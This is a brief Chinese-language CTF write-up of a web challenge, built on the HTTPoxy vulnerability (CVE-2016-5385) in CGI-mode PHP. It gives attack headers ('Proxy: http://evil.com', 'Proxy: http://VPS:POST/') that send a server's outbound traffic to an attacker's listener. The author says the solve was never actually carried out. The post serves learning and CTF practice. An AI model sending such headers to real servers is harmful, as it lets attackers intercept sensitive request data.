长安战疫-web-flag配送中心复现


长安战疫-web-flag配送中心复现

前置知识

HTTPoxy漏洞(CVE-2016-5385)

漏洞原文:https://httpoxy.org/

漏洞简介

根据RFC 3875规定,cgi(fastcgi)要将用户传入的所有HTTP头都加上HTTP前缀放入环境变量中,而恰好大多数类库约定俗成会提取环境变量中的HTTP_PROXY值作为HTTP代理地址。于是,恶意用户通过提交Proxy: http://evil.com 这样的HTTP头,将使用缺陷类库的网站的代理设置为http://evil.com ,进而窃取数据包中可能存在的敏感信息。
PHP5.6.24版本修复了该漏洞,不会再将Proxy放入环境变量中。一般是利用PHP 5.6.23版本中的漏洞。
当然,该漏洞不止影响PHP,所有以CGI或Fastcgi运行的程序理论上都受到影响。

影响前提

1.你的服务会对外请求资源
2.你的服务使用了HTTP_PROXY(大写的)环境变量来代理你的请求(可能是你自己写,或是使用一些有缺陷的类库)
3.你的服务跑在PHP的CGI模式下(cgi, php-fpm)

做题详解

用burpsuite抓包后在请求头添加Proxy头:

Proxy: http://VPS:POST/

在自己的vps监听对应端口后,发包。
即可监听到flag。
(由于还没有买服务器,暂时无做题过程,完了再补QAQ)
参考:
https://www.laruence.com/2016/07/19/3101.html
https://blog.csdn.net/JiangBuLiu/article/details/95218436


Author: kingkb
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source kingkb !